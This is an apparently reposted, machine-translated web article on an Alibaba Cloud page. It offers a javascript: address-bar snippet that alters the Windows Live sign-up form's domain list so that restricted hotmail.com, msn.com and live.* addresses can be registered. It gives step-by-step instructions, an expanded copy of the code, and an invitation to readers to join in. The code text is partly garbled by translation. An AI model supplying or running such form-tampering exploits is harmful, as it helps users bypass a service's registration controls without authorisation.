Code used to exploit the @ live.com domain name registration vulnerability in Windows Live

Source: Internet
Author: User
Tags domain name registration

Another Windows Live @ live.com domain name registration vulnerability was discovered. Now we only need to use a simple piece of JS Code to add the @ live.com address to the Windows Live registration interface. What surprised us is that, the Entered IP address can be successfully registered to the account! This is another great opportunity. Come and join us!

Update: Update code to provide more domain names, including live.cn.
Simple Method:

1. Enter this page: http://get.live.com/getlive/overview
2. Click "register now ".
3. paste the Code in the following file in the address bar and press Enter:Copy codeThe Code is as follows: javascript: function r (q) {} function s (q) {e [q] = new Option (a [q], a [q])}; r (e = document. getElementById ("idomain "). options); r (d = "live. "); r (a = new Array (" hotmail.com "," hotmail. co. uk "," msn.com ", d +" com ", d +" be ", d +" co. uk ", d +" de ", d +" fr ", d +" it ", d +" nl ", d +" cn ")); for (I = 0; I <. length; I ++) {s (I)} alert ("Success-additional domains added! ");

After analysis:Copy codeThe Code is as follows: javascript:
Function r (q ){}
Function s (q) {e [q] = new Option (a [q], a [q])};
R (e = document. getElementById ("idomain"). options );
R (d = "live .");
R (a = new Array ("hotmail.com", "hotmail. co. uk "," msn.com ", d +" com ", d +" be ", d +" co. uk ", d +" de ", d +" fr ", d +" it ", d +" nl ", d +" cn "));
For (I = 0; I <a. length; I ++ ){
S (I)
}
Alert ("Success-additional domains added! ");

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.